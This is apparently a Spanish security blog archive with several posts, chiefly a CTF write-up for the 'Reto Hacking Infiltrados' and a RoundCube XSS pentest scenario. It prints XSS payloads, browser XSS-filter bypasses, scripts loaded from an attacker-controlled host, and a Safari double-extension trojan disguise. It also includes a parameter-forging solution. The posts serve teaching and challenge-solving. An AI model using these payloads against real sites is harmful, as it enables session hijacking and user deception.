Jugando con RoundCube (3 de 5)

************************************************************************************************
- Jugando con RoundCube (1 de 5)
- Jugando con RoundCube (2 de 5)
- Jugando con RoundCube (3 de 5)
- Jugando con RoundCube (4 de 5)
- Jugando con RoundCube (5 de 5)
Autor: Enrique Rando
************************************************************************************************

Episodio 4. Esnifando XSS fantasmas

Digamos que estamos hablando de una compañía llamada Example.Com, que tiene su página web http://www.example.com. Y supongamos, por decir algo, que alguien está realizándoles un test de penetración. FOCA en mano, analiza algunos documentos y encuentra joyas como esta:

Figura 13: Informe realizado con FOCA

Interesante… un usuario “big.boss” ha creado recientemente un documento de Word, seguramente usando Word 2003, en un equipo con Windows XP. Esto de “Windows XP” puede ser muy, pero que muy relevante. Porque Internet Explorer 9 no se instala sobre Windows XP.

Figura 14: Si usas XP… no hay Internet Explorer 9

O sea, que “big.boss” tiene, como mucho, Internet Explorer 8 (quizá use Firefox o Chrome pero siendo un “gran jefe”…). Y aquí es donde entra en juego una de las características de Internet Explorer: el MIME sniffing. Este navegador, a la hora de determinar el tipo de un archivo, no se contenta con examinar su extensión, sino que analiza su contenido. ¿Qué quiere decir esto? Pues, a efectos prácticos, que si tenemos un fichero llamado “texto.txt” con el siguiente contenido:

<html> <body>
Esto es una <b>prueba</b>
</body> </html>
<script language="javascript">
alert("Ejecuta el script");
</script>

Figura 15: Si se abre con Internet Explorer 8 se come el XSS

Internet Explorer ve que lo que tiene el fichero parece más propio de una página web que de un fichero de texto plano y actúa en consecuencia. Esto, como estaréis pensando, no es necesariamente bueno para la seguridad y, de hecho, en Internet Explorer 9 se introducen algunos cambios para evitar que un inocente fichero de texto pueda realizar su particular “escalada de privilegios” y convertirse en un script de forma tan sencilla.

Figura 16: El XSS no se ejecuta en Internet Explorer 9 en este caso

En definitiva, que si el “big.boss” usa IE 8, posiblemente se la pueden jugar. Siguiendo con el análisis de Example.com, del análisis de los registros DNS realizado por FOCA se deduce que la organización tiene un servicio de webmail accesible mediante la URL “htttp://webmail.example.com”. Al visitar dicha URL, el usuario es redirigido a http://webmail.example.com/roundcubemail-0.6-beta/

Figura 17: Webmail de RoundCube

La URL, y la apariencia de la página revelan que se está usando RoundCube. ¿Estará bien configurado?

Figura 18: Pues va a ser que no

Episodio 5. El amigo del jefe

Hace poco que estuve viendo una charla sobre XSS. Creo que era de Raúl Siles (y si no, ruego que me disculpen tanto el ponente como Raúl Siles). El caso es que decía que esto del XSS no está bien vendido. Aparte de proponer un nombre alternativo, más impactante y acorde con la realidad, señalaba que los ejemplos de explotación habituales no suelen ser demasiado afortunados. Por ejemplo:

Figura 19: Tipico XSS

Muéstrale esto a un directivo e imagina qué estará pensando: “¡Oh! ¡Dios mío! ¡Esta gente es capaz de hacer que nuestras páginas muestren un mensaje al usuario! ¡Qué miedo! ¡Qué horror! ¡Qué va a ser de nuestros planes de negocio, de nuestro futuro, cuando la gente lo sepa! ¡Estamos perdidos! ¡Por favor, que alguien lo arregle!”.

O eso, o quizá: “Vaya chorrada que me trae éste… mensajitos”. Pensemos ¿Podría hacer algo con esto un usuario malicioso para fastidiar al jefe? Pues, como veremos, no poca cosa. Supongamos que este usuario se llama “Evil”, que pertenece a la organización y que es un topo, infiltrado por la competencia. Un día comienza a construir un mensaje de correo que contiene un fichero adjunto, “script.htm” con el siguiente contenido:

Figura 20:  Adjunto en  formato HTML 

Figura 21: Correo como adjunto HTML

Por las buenas o por las malas, Evil tiene bajo su control el servidor “evil.example.com” y ha puesto en él un fichero “evil.js” con este regalito:

Figura 22: evil.js

Donde tanto la URL base del webmail como el nombre de la carpeta de la que sacar los mensajes puede variar según la implementación particular de RoundCube. A estas alturas, supongo que ya sabréis en qué estoy pensando.

************************************************************************************************
- Jugando con RoundCube (1 de 5)
- Jugando con RoundCube (2 de 5)
- Jugando con RoundCube (3 de 5)
- Jugando con RoundCube (4 de 5)
- Jugando con RoundCube (5 de 5)
************************************************************************************************

Solucionario a Reto Hacking Infiltrados (3 de 3)

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx
**********************************************************************************************

URL del Reto: Reto Hacking Infiltrados

4- Fase II

Para mí esta fase fue más divertida que las anteriores, ya que odio los XSS jeje y además, no requería de ninguna validación por una persona física. Esto daba más libertad para realizar pruebas. Que fuera más divertida no quiere decir que fuera más fácil :) Al entrar en el reto vemos esto:


Figura 5: Acceso en Fase II
En la URL nos aparecen 2 parámetros (mail y app_hash) y al pinchar en el botón Entrar nos dice que el mail no corresponde con el hash. La URL es esta:

http://rhinfiltrados.informatica64.com/F@S%E2%82%AC_TW0_INI.aspx?mail=CAoLAAIdARUWDhcGHCYAAhIdEwkOBwANB19YWhwEEA%3d%3d&app_hash=97c4655a4b1e7d07477a6c53a901bf691d9405a7

Y los parámetros:

mail=CAoLAAIdARUWDhcGHCYAAhIdEwkOBwANB19YWhwEEA==
app_hash=97c4655a4b1e7d07477a6c53a901bf691d9405a7

Aparentemente, tenemos que conseguir un mail que concuerde con un app_hash y, para ello, lo que vamos a hacer es analizar cada uno de los parámetros. El mail es claramente un base64 que si hacemos un unbase64 vemos algo ilegible. Tras varias pruebas con los HEX obtenidos vi que aplicando un XOR con la palabra infiltrados aparecía algo que llamaba la atención:

unbase64(mail) XOR 'infiltrados' -> _XZ###strad##&####

Así que probé a concatenar la palabra:

unbase64(mail) XOR 'infiltradosinfiltrados' -> _XZ###strador@informat

Y con algunas pruebas más:

unbase64(mail) XOR 'infiltradosinfiltradosinfiltrad'
-> administrador@informatica64.net

El sencillo script que usé fue (en perl, of course! :P ):


Figura 6: Script en Perl para decodificación de mail
Supuestamente necesitaremos codificar nuestro mail (con el que nos registramos al reto) para poder validarnos correctamente, por lo que hacemos la operación inversa para calcular el base64 correspondiente, en este caso, al mail con el que me registré (pepeluxx@gmail.com) … menos mal que no usé ninguna dirección guarrona xDD. Bueno, pues el script que usé es:


Figura 7: Script en Perl para codificación de mail
Evidentemente, la palabra que se usa para hacer el XOR debe tener la misma longitud que mi mail. Y el resultado: base64(mail XOR 'infiltradosinfiltr') -> GrkWDAABChkkCB4IBwpHDxsf

El segundo parámetro, app_hash, podemos ver que tiene 40 bytes por lo que una posible codificación es SHA1 o RIPEMD160. Preguntando el resto de participantes (el que no haya preguntado a nadie que tire la primera piedra xDD), vi que el mail era el mismo para todos pero el app_hash variaba. Cerrando sesión y volviendo a entrar siempre tenía el mismo hash. Incluso conectando desde otra dirección IP, éste no variaba. Eso me hizo pensar que tenía algo que ver con alguno de mis datos de registro.

De manera que probé a codificar cada uno de mis datos (nick, nombre, apellidos, mail, provincia, población, incluso el ID de usuario con y sin guiones). Lo probé con SHA1 y con RIPEMD160 al mismo tiempo que usaba el base64 correspondiente a mi mail. Intenté validar usando mi mail y ese hash resultante pero no hubo éxito.

Tras esto pensé en intentar averiguar cómo estaba formado ese hash, del mismo modo que hice con el mail. Así que me creé un script que probaba todas las combinaciones de mis datos de registro (solos, concatenados a dos, a tres, etc) y luego encriptando con ambos algoritmos y buscando como resultado el valor que no daba la URL. Tampoco hubo suerte.

El siguiente paso fue añadir al script un XOR de la palabra que le metiera como parámetro. Probé con infiltrado, informatica64, el nombre de la url, mis datos sueltos, concatenados, etc … nada. Luego probé lo mismo pero combinando un base64 y el XOR o el base64 sólo … nada de nada.

El caso es que enfoqué mal la forma de resolverlo y busqué obtener ese hash que tenía, cuando lo que debía haber hecho es probarlos directamente en la URL, ya que, al final, la solución era tan simple como rebuscada. El hash era: SHA1(mi_id concatenado con mi_mail)

Por tanto, mi solución (diferente a la del resto de usuario, evidentemente) fue:

http://rhinfiltrados.informatica64.com/F@S%E2%82%AC_TW0_INI.aspx?mail=GrkWDAABChkkCB4IBwpHDxsf%3d&app_hash=7d33c26d2bb41d320e0331363c2c036f6c7de906

Donde:

mail=GrkWDAABChkkCB4IBwpHDxsf
app_hash=7d33c26d2bb41d320e0331363c2c036f6c7de906

Y al pasar el reto vemos:


Figura 8: Reto Finalizado
5- Agradecimientos

Como siempre, ha sido un gran placer participar en el reto. A la gente que nos gusta jugar sabemos lo difícil y laborioso que es preparar este tipo de retos. Así que, enhorabuena y muchas gracias a Informática64 y en especial a Chema Alonso y sobre todo, al equipo de gente que ha estado validando todas nuestras pruebas (sois unos cracks!! xDDD).

También mi enhorabuena a todos los participantes, en especial a Yuri, que ya podía haberse centrado en el reto de Suiza xDDD (es broma), Nadid, danigargu, Budaned y Thanar.


Figura 9: Hall of fame
Y como siempre, saludos para los más grandes! Okaboy, Kachakil, RoManSoft (nunca se si escribo bien las mayúsculas del nick), Miguel Gesteiro, Int3pids (el resto), PainSec, etc, etc, etc... Y otro saludo también a r0i, k4dm3l, ralcaz, marcositu, ….

Hasta el próximo!

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx - http://www.pepelux.org - http://blog.pepelux.org
**********************************************************************************************

Solucionario a Reto Hacking Infiltrados (2 de 3)

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx
**********************************************************************************************

URL del Reto: Reto Hacking Infiltrados

3.1- Mozilla Firefox v4.0.1

En el caso de Firefox no hizo falta saltarse ningún filtro, ya que directamente, no hay. Sólo había que ingeniarse una forma de acceder engañando al admin. Y la solución, tras varias pruebas, fue mandando en el campo ctl00%24cph2%24tbUrl esto:

http://rhinfiltrados.informatica64.com/inicioReto.aspx?idUsuario=950e8c2b-3a74-4f24-a809-40d32a9f73b6<script>function f(){document.aspnetForm.ctl00$cph2$hfidUsuario.value='950e8c2b-3a74-4f24-a809-40d32a9f73b6';document.aspnetForm.submit();}</script>

Para que se vea mejor, voy a desglosar el script que inyecté:

<script>
function f()
{
document.aspnetForm.ctl00$cph2$hfidUsuario.value='950e8c2b-3a74-4f24-a809-40d32a9f73b6';
document.aspnetForm.submit();
}
</script>

<BODY+ONLOAD=f()>

Lo que hace esto es lo que he comentado antes, cambiamos el valor del ID de usuario por el nuestro y luego ejecutamos el submit. Y para que el script se ejecute al cargar la página, lo invocamos con un BODY ONLOAD.

3.2- Google Chrome v11.0.696.65

El segundo en caer fue Chrome. Aquí encontré una solución que yo creo que es válida, pero que no se tomó como buena en las repetidas veces que lo intenté mandar. A ver si Chema me explica porqué no iba }:->

Una vez entendida la dinámica tras superar el obstáculo usando Firefox, ya tenemos clara la finalidad y lo que tenemos que hacer, por lo que antes de mandar a lo loco incidencias, tenemos que probar a ejecutar, sin mandar incidencias, un simple alert usando Chrome. La cosa no fue fácil ya que trae un filtro anti-XSS, pero bueno, encontré googleando varias formas de saltárselo y una de ellas es cargando un fichero externo, tal que así:

<script src=http://url/file.js?

Y metiendo en file.js un alert, por ejemplo (sin poner las etiquetas de script):

alert('XSS')

Como ya tenemos una forma de inyectar, el siguiente paso es probar a cambiar el ID de usuario y hacer el submit. Por lo que file.js quedaría así:

function f()
{
document.aspnetForm.ctl00$cph2$hfidUsuario.value='950e8c2b-3a74-4f24-a809-40d32a9f73b6';
document.aspnetForm.submit();
}
window.onload=f;

Esto dio bastante guerra ya que no terminaba de funcionar. Así que puse un alert delante y otro detrás y vi que se ejecutaba el primero pero no el segundo. Mirando con la consola de Chrome, aparecía un error diciendo que ctl00$cph2$hfidUsuario no existía.

Obviamente, si inyectamos ese código en el que no cerramos el script, todo lo que hay detrás queda inservible. Por lo que una solución fue modificar el script para que creara de nuevo ese input, quedando el fichero así:

function newInput()
{
var inpt = document.createElement('input');
inpt.type="text";
inpt.name="ctl00_cph2_hfidUsuario";
inpt.id="ctl00$cph2$hfidUsuario";
document.aspnetForm.appendChild(inpt);
document.aspnetForm.innerHTML+="
";
}

function f()
{
newInput();
document.aspnetForm.ctl00$cph2$hfidUsuario.value='950e8c2b-3a74-4f24-a809- 40d32a9f73b6';
document.aspnetForm.submit();
}

window.onload=f;

De esta forma ya no daba error y, al menos en el mail que yo recibía, iba todo bien, pero no me dieron por válida esta solución. Así que probé otro método que encontré para saltar el filtro de Chrome y que consistía en usar iframes:

<iframe src='data:text/html,<script src=http://url/file.js></script>

Que en local iba bien pero tampoco fue una solución válida. A estas alturas y ya bastante desesperado, sobre todo pensando en que IE9 iba a ser mucho más difícil aún, lo que probé es a pasar el reto sin la necesidad de explotar ningún XSS, accediendo al eslabón más débil, el humano … y voilá!

La solución pasó por enviar en el campo ctl00%24cph2%24tbUrl http://url Donde esa URL era una IP mía en la que había una copia exacta de inicioReto.aspx, con mi ID de usuario y añadiendo al final de la página:

<script>
window.onload = function(){ document.aspnetForm.submit(); }
</script>

3.3- Internet Explorer v9.0.8112.16421

Este reto lo pasé exactamente igual que con Chrome (supongo que con Firefox también se habría pasado sin problemas) aunque como estuve realizando las pruebas por la noche, con el reto cerrado y, al mismo tiempo que preparaba la inyección para el Chrome, hice algunas pruebas y, la forma de saltarse el filtro de IE9, al igual que IE8, es añadiendo un %0a en la etiqueta del script, algo así:

<sc%0aript>alert('XSS')</script>

Estuve probando la técnica usada por Beni en el reto de BrowserSchool y que consistía en superponer una imagen exactamente igual a la que aparecía en el reto pero que al pincharla llevara a mi IP. Aquí me encontré el problema de que el filtro del IE9 elimina los puntos de las URLs así que para saltarlo use como URL el valor decimal de mi IP y al script quitarle el punto … algo así:

http://3232235876/filejs

En este caso, al contrario que en la técnica anterior, no se podía hacer un submit de forma automática y había que esperar a que el administrador pinchara en la puerta. Al final, esta solución tampoco me la dieron por buena. Y como dije antes, la pasé exactamente igual que con Chrome. Tras pasar los 3 navegadores, podemos ver algo así:


Figura 4: Fase 1 pasada
**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx - http://www.pepelux.org - http://blog.pepelux.org
**********************************************************************************************

Solucionario a Reto Hacking Infiltrados (1 de 3)

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx
**********************************************************************************************

URL del Reto: Reto Hacking Infiltrados

1- Introducción

La verdad es que me encantan los retos que prepara Chema Alonso porque están muy cuidados estéticamente. Es cierto que este reto, como su antecesor, son validados por personas físicas y llega a ser un poco coñazo, tanto para los participantes que tenemos que esperar a veces media hora para ver si una prueba es válida, como para los pobres que están varias horas al día validando nuestros numerosos intentos.

Este tipo de retos tienen como inconveniente el factor humano; y es que hay veces que una respuesta te la toman como mala y la vuelves a mandar y te la toman como buena, pero bueno, es parte del reto.

Cuando me registré y vi los logos de Google Chrome, Firefox e Internet Explorer, empecé a olerme (supongo que como todo el mundo) que se trataba de un reto basado en vulnerabilidades XSS, pues tenía toda la pinta de que el reto iba de saltarse algo en los 3 navegadores. Así que un buen comienzo, antes de empezar el reto, es leerse bien los solucionarios del BrowserSchool, escritos por Beni (buena pieza este Beni, jeje).

2- Análisis del reto

Ya pagué la novatada en el reto de BrowserSchool y me puse a probar a lo loco sin entender la dinámica del reto y, en ese caso, creo que no pasé más que un navegador; así que esta vez, me lo tomé con más calma y me leí y releí la ayuda del concurso y, me tomé mi tiempo en pensar cual era la finalidad de todo esto, antes de empezar a mandar y sufrir la larga espera de cada validación.

Tenemos 3 puertas que dan acceso a 3 salas diferentes. Cada una gestionada por un administrador, el cual usa diferente navegador para gestionar las incidencias de los usuarios.

Nosotros no tenemos acceso ya que desconocemos las claves de las salas pero, según la ayuda, el administrador es capaz de entrar a su sala sin necesidad de introducir clave alguna. Esto es importante ya que sabemos que no hay que robar ninguna clave sino que todo apunta a que hay que hacerse pasar por administrador para entrar.

Lo que nos aparece al entrar en la sala de validación es esto:


Figura 1: Puertas sin abrir

3- Fase I

Voy a escribir la solución de cada navegador por orden, tal y como yo lo pasé.

El primero en caer fue Firefox. Creo que está más que demostrado que ante errores de XSS es de los más permisivos y, por tanto, es al que más fácilmente se la podemos colar.

Analizando la página de acceso (inicioReto.aspx) vemos que al pinchar en una de las puertas se recarga la página y nos carga nuestro ID de usuario en la URL (en mi caso, inicioReto.aspx?idUsuario=950e8c2b-3a74-4f24-a809-40d32a9f73b6) y también vemos que ese ID de usuario se escribe abajo del todo. Si probamos vemos enseguida que existe una vulnerabilidad XSS. Por ejemplo:


Figura 2: XSS en inicioReto.aspx?idUsuario=xxx<script>alert('XSS')</script>;
Por supuesto, todas estas pruebas las realicé desde un Firefox, ya que, como dije, es el más permisivo en cuando a XSS.

Por otro lado, si mandamos alguna incidencia vemos que nos llega una copia del mail que recibe el administrador. En este mail viene nuestro usuario, la descripción de la incidencia y un link hacia inicioReto.aspx. En ese link viene asociado nuestro ID de usuario.

Si mandamos otra incidencia de prueba y la capturamos, por ejemplo, con el TamperData, vemos:


Figura 3: Datos envíados interceptados por TamperData
Ese enlace que le llega es lo que aparece en el campo ctl00%24cph2%24tbUrl. Por tanto, podemos tratar de meter algo para que al pinchar, y acceder a la web, explote la vulnerabilidad XSS que hemos encontrado.

En un principio pensé que había que robar la cookie del administrador para luego acceder nosotros manualmente con esa cookie y estuve probando algunas inyecciones en las que trataba de robar esa cookie. La forma de hacerlo fue intentando enviar un document.cookie hacia mi máquina, pero no tuve éxito.

Pensando un poco en lo que ponía en la ayuda, acerca de que el administrador entraba de forma automática, pensé que igual se podía hacer justamente al contrario, es decir, si el admin entra de forma automática, inyectarle a él mis datos para que entre usando su cookie pero con mi ID de usuario. Y así fue como ocurrió.

Si vemos el código fuente de la página nos encontramos con un campo llamado ctl00$cph2$hfidUsuario que contiene nuestro ID de usuario. El admin al entrar en la página, evidentemente tendrá el suyo. Por tanto, lo que vamos a tratar de hacer es cambiarlo para que acceda a la web con el nuestro y acto seguido, hacer un submit para que acceda, de forma automática, por la puerta correspondiente (recordemos que el admin NO necesita validación, por lo que un simple submit hará que pase por la puerta sin tener que escribir su clave de acceso).

Ahora el tema está en cómo saltar los filtros de cada navegador para poder hacer esto.

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx - http://www.pepelux.org - http://blog.pepelux.org
**********************************************************************************************

Un Tip para las presentaciones: Ponte Porno

En muchas presentaciones, cuando quieres hacer una demo que comienza con una búsqueda, porque vas a hacer Google Hacking, o símplemente porque vas a hacer clic en un enlace que ya has probado antes, el camino se queda marcado con los colorines de "enlace visitado".


Figura 1: Links visitados en moradito
Sin embargo, si no te interesa que se vean los links visitados, puedes borrar el historial, borrar las cookies, etc... o justo antes de empezar a hacer la demo abrir el navegador en modo porno, es decir, inPrivate. Es rápido y cómodo.


Figura 2: Modo InPrivate
Este truco también es útil para cuando estás haciendo las capturas para un artículo o un post en un blog. Os dejo este truco aquí, porque he visto muchas presentaciones de speakers que pierden un poco de frescura símplemente porque ya se sabe donde va a hacer clic.

Saludos Malignos!

¿Debe un CERT jugar a esto?

Durante la semana pasada me estuvieron poniendo en Facebook, twitter y en mi correo personal un advisory que había sacado INTECO, el CERT nacional por excelencia, dentro de la sección de Avisos de Seguridad Técnicos, y me pareció tal chorrada, que no he podido contenerme para escribir este post.

Vaya por delante que conozco a bastantes de los técnicos que allí trabajan y sé que son buenos profesionales, pero en este caso, la elección de lo que se debe publicar me parece erronea, pues juega casi a ser un blog. Y eso no es lo que debe ser un CERT, aunque pueda contar con un blog para profundizar o debatir sobre cuestiones en otro nivel de comunicación.

Un CERT, es un Centro de Emergencia y Respuesta Temprana ante incidencias, y cuando hablamos de Inteco, estamos hablando de un CERT nacional, con soporte de dinero público, que debe ocuparse de eso, de las emergencias de seguridad de España, y no de hacer publicidad a VUPEN, y me explico.

La compañía VUPEN, igual que muchas otras empresas de seguridad a lo largo del mundo, ofrece para sus clientes un servicio de exploiting, de patching, de información, sobre vulnerabilidades descubiertas por ellos, exploits realizados por ellos o workarrounds de fortificación de estos fallos. Así, empresas como ZDI, Core o Immunity desarrollan exploits sobre vulnerabilidades descubiertas por ellos, o no, que ofertan a sus suscriptores, tal y como vimos en el ejemplo de Canvas de Immunity con Apple Safari.


Figura 1: Expediente de Apple Safari con 0day y exploit disponible para sus clientes publicado por VUPEN
De hecho, el informe que publicó Inteco, en la sección de Artículos de Seguriad técnicos, no difiere prácticamente en nada con el que publicaron un mes atrás con las vulnerabilidades de Apple Safari 5.0.3, con el que VUPEN ganó el Pwn2Own, qué también eran de nivel crítico, y también habían puesto a disposición de sus clientes un exploit. Ese es su business, y lo hacen prácticamente a diarío con todo los productos.


Figura 2: Últimos expedientes publicados por VUPEN
Ahora bien, la pregunta que me viene es... ¿Por qué publicar el 0day de ie9 en RTM y no el 0day de Apple Safari en versión final o el de Google Chrome del día 12?

Sin embargo, en la sección de artículos técnicos, el CERT nacional no ha dicho nada de la operación Lizamoon, que tiene a día de hoy, más de 5.000 Urls afectadas en España.


Figura 3: más de 5.000 URLs en dominio .es afectadas
Según la web, INTECO-CERT tiene como finalidad es servir de apoyo preventivo y reactivo en materia de seguridad en tecnologías de la información y la comunicación tanto a entidades como a ciudadanos, y estas cosas sí son importantes para los ciudadanos.

Tampoco ha dicho nada de que Apple, con la actualización de iOS a la versión 4.3 ha dejado sin parches de seguridad a muchisimos ciudadanos españoles con móviles 3G (perdonad que no os de los datos, pues no los tengo, pero habría que buscar el número exacto de dispositivos que se vendieron).

También me llama la atención de que avisen de la actualización de Google Chrome, algo que por defecto es automático, y sin embargo no alerten de que las empresas deben probar antes sus aplicaciones, y que Google Chrome puede ser configurado para que la actualización sea controlada, y no cuando Google decida.

No creo que esta sección esté teniendo el rigor que una sección como esta debería tener en un CERT, ya que, lo más triste, es que VUPEN no ha publicado el expediente de seguridad aún, ni hay CVE aún, ni nada, solo un twitt y una referencia en una entrevista que, desde Inteco, ya sirve para hacer una aviso de seguridad técnico y calificarlo de "Nuevo 0day en IE9". ¿A vosotros os parece que se debe "jugar" a esto desde un CERT?

Saludos Malignos!

Camuflar un troyano como un vídeo en Apple Safari 5.0.4

Una de las características principales en las que los navegadores tienen que hacer foco es en la protecciones contra las técnicas de ingeniería social. Muchos han sido los trucos utilizados por atacantes para engañar al usuario y hacerle creer que estaba descargando un fichero, viendo una web o haciendo clic en una opción, cuando realmente estaba siendo engañado.

Como tuve algo de tiempo en Buenos Aires, quise probar como andaban las nuevas versiones de los navegadores contra un truco sencillo de ingeniería social. En esta ocasión es Apple Safari 5.0.4, es decir, la última versión publicada, la que cae en un engaño muy tonto a la hora de mostrar el nombre del fichero que le está descargando al usuario.

Supongamos que una web maliciosa decide mostrar un link a un supuesto vídeo de Paris Hilton haciendo sus cosas con sus amigos en uno de sus hoteles. Si el usuario de la web, ávido de conocimiento y ganas de descargar el archivo, hace clic en el fichero para que se descargue, el navegador mostrará el nombre del fichero a descargar y la opción a aplicar una vez descargado, es decir, abrir, ejecutar, guardar, etcétera.

Uno de los trucos más utilizados a lo largo de la historia ha sido el de la doble extensión. El usuario cree que está descargando un archivo .avi, pero realmente es un .avi.exe, es decir. Un fichero ejecutable.

Las últimas versiones de los navegadores de Internet Explorer, Google Chrome, Firefox u Opera, tienen especial cuidado contra este tipo de trucos, así, tienen mucho cuidado de mostrar la extensión del fichero a la hora de enseñarle al usuario el cuadro de diálogo.

Internet Explorer y Google Chrome, separan la extensión y siempre la ponen al final del archivo. En el supuesto caso de que el fichero tenga un nombre muy largo, los navegadores mostrarán la primera parte del nombre del archivo y la extensión. Firefox muestra de la extensión hacia atrás lo que entre y Opera selecciona parte del principio del nombre, y parte del final con la extensión.


Figura 1: Visualización en Opera


Figura 2: Visualización en Internet Explorer 9


Figura 3: Visualización en Google Chrome
Sin embargo, Apple Safari 5.0.4 no hace eso, basta con solicitar la descarga de un fichero con un tamaño fijo de caracterectes, tal y como se ve a continuación, para que la auténtica extensión del fichero quede sustituida por unos sutiles puntos suspensivos.


Figura 4: Troyano con doble extensión simulando ser .avi


Figura 5: Visualización del troyano en Apple Safari 5.0.4
Si el usuario no presta atención a los puntos suspensivos y da al botón de ejecutar, pensando que se le va a reproducir el tan ansiado vídeo, lo que va a obtener, por el contrario, es la ejecución de un troyano. Sencillo, pero funcional y peligroso.

Saludos Malignos!

De bucaneros, corsarios y piratas

He de confesar que los barcos me gustan los justo y poco más. Tiempo ha, cuando el miedo a lo desconocido y las alturas me llevaban a temer volar en pájaros de hierro, siempre pensé que cruzaría el charco montado en un Titanic – maldígase la elección de ejemplo – antes que subir a una de esas cosas de metal que retan a las leyes de la física y a las de la esperanza en caso de fallo, ya que no llevan paracaídas para todos.

Sin embargo, las películas de barcos, y aún más, las historias noveladas alrededor los buques de guerra, los enormes galeones o bergantines, atestados de piojosos militares enrolados a la fuerza tras una mala noche de alcohol o ávidos de oro y saqueos, me mantienen en vilo y nervioso mientras intento ser capaz de entender toda la terminología de piezas y archiperres que conforman la difícil germanía náutica.

Aprovechando un forzoso parón médico he aprovechado para bucear entre los libros de mi biblioteca, aún de oloroso papel, para rescatar del naufragio un libro con el que me obsequiaron unas navidades atrás, en el que D. Arturo Pérez Reverte recoge un misterio de los de tomo y lomo, con su asesino en serie, su oscuro y crudo policía, los gabachos de los obuses y vigía de la imperial napoleónica, en el asedio de uno de los puertos más famosos en la historia hispánica. El puerto de Cádiz, y nada más y nada menos, que a un año de que se proclame la Pepa.

Y en mitad del misterio, plagado de virus y con el tiempo más escaso que el presupuesto español en innovación tecnológica, me encuentro en medio de una nueva e inminente batalla naval. La guerra de los browers que tenemos en ciernes, y de la que ya se han soltado los primeros tiros, aunque de momento no se ha dado barra libre a la Santa Bárbara, y solo se han lanzado las primeras hostilidades desde pequeños falconetes.

Es una batalla con reminiscencias, ya que la guerra comenzó tiempo largo ha y no ha hecho nada más que vivir etapas de latencia, pero nada por el estilo a una posible tregua indefinida.

Hoy, día 14 de Marzo, Microsoft presenta la versión final de Internet Explorer 9, dispuesta a demostrarse digna sucesora de IE8 que se lanzó 2 años atrás, que puso los listones altos en la parte de seguridad. Con la nueva versión de IE9 acompañan múltiples funcionalidades nuevas, como los Tracking Protection Lists, el Download Reputation Filter, o el resto de pequeñas opciones de mejora.

Por su parte Google Chrome, que ha tomado carrerilla en la creación de versiones estables – ya va por la 10 en mi equipo – está poniéndose las pilas a la hora de acumular plugins y desarrolladores para tener lo que el usuario necesite en cuanto a funcionalidades. Respecto a seguridad, el producto sigue basándose en chromium y webkit y con resultados dispares. Sigue sin un filtro AntiXSS por defecto, enviando URLs y sufriendo las actualizaciones de las muchas vulnerabilidades de Webkit, que ya la versión 9, con un ciclo de vida cortisimo, tuvo 58 vulnerabilidades.

En la última Pwn2Own de la CanSecWest, Google Chrome, quedó sin ser explotado como sucediera el año pasado, y es que el truco de actualizar el navegador el día antes de que se paralicen las versiones de software les ha salido bien, aunque la vulnerabilidad encontrada en Blackberry afecta igualmente a Google Chrome, solo que el exploiter que la encontró estaba centrado en Blackberry y no en Chrome. Así que, aunque se encontró una vulnerabilidad explotable – que Google Chrome ha corrido a parchear inmediatamente – según las reglas quedó sin pwnear.

Además, Google Chrome está trabajando la parte de administración usando políticas, pudiendo hasta eliminar ya las actualizaciones automáticas para que sean manuales. Habrá que ver si podemos eliminar también en el futuro la opción de enviar las URLs de navegación.

Por su parte Mozilla prepara la nueva versión de su navegador, para intentar defender su segunda posición en el mercado de la navegación que cada día cuesta más defender por lo pujante de Chrome y Safari.

Safari sigue siendo "esa herramienta que Apple trae para que hagan jailbreak" en los dispositivos. En la última actualización, la 5.0.4 solucionó más de 60 vulnerabilidades. Soluciones que se aplicaron en Apple iOS 4.3 pero que dejan a los usuarios de iPhone 3G sin parche, creando un aluvión de críticas que han llevado incluso a que Apple bannee los mensajes en los foros oficiales. Gracias a una vulnerabilidad de Apple Safari, los productos Apple volvieron a ser hackeados en primer lugar, como en todas las ediciones de Pwn2Own.

Por supuesto, la guerra de los navegadores no va a terminar aquí, todo anda enfangado con los estándares HTML 5 y el cumplimiento o no por parte de ellos según la W3C, la inclusión o no de codecs abiertos o con copyright y, por supuesto, el rendimiento y la aceleración gráfica. Va a ser una temporada de batallas al más puro estilo de los grandes veleros, y yo me lo voy a pasar pirata por ahí en medio.

Saludos Malignos!

Mantén tu sistema al día o entrégalo al enemigo (2 de 2)

*********************************************************************************************
- Mantén tu sistema al día o entrégalo al enemigo (1 de 2)
- Mantén tu sistema al día o entrégalo al enemigo (2 de 2)
Artículo escrito para la Revista Windows Oficial de Febrero de 2011
*********************************************************************************************

Parchear tu Windows

Espero, con la introducción previa de la anterior parte al duro mundo en el que nos encontramos, haber captado tu atención para que te interese cómo tener tu sistema actualizado en todo momento, para reducir al máximo, que con completamente, el riesgo de caer en un exploit que comprometa tu máquina.

Lo más moderno mejor

